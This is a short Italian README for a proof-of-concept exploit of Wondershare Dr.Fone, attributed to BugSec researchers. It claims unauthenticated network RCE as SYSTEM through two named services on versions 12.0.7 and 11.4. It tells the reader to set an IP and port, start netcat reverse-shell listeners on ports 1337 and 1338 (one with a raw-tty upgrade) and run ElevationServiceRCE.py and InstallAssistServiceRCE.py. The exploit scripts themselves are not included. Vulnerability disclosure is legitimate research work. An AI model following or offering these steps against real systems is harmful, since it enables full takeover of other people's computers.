
Netanel Cohen e Tomer Peled, ricercatori di sicurezza di BugSec.
Esempio di POC per sfruttare Wondershare Dr.Fone.
Dr.Fone è un toolkit per telefoni sviluppato da wondershare, vulnerabile a RCE.
Solo con accesso di rete riusciamo a eseguire codice remoto come utente SYSTEM.
Servizi vulnerabili:
InstallAssistService.exe
ElevationService.exe
Testato sulle versioni: 12.0.7, 11.4
Modifica IP e porta ed esegui.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py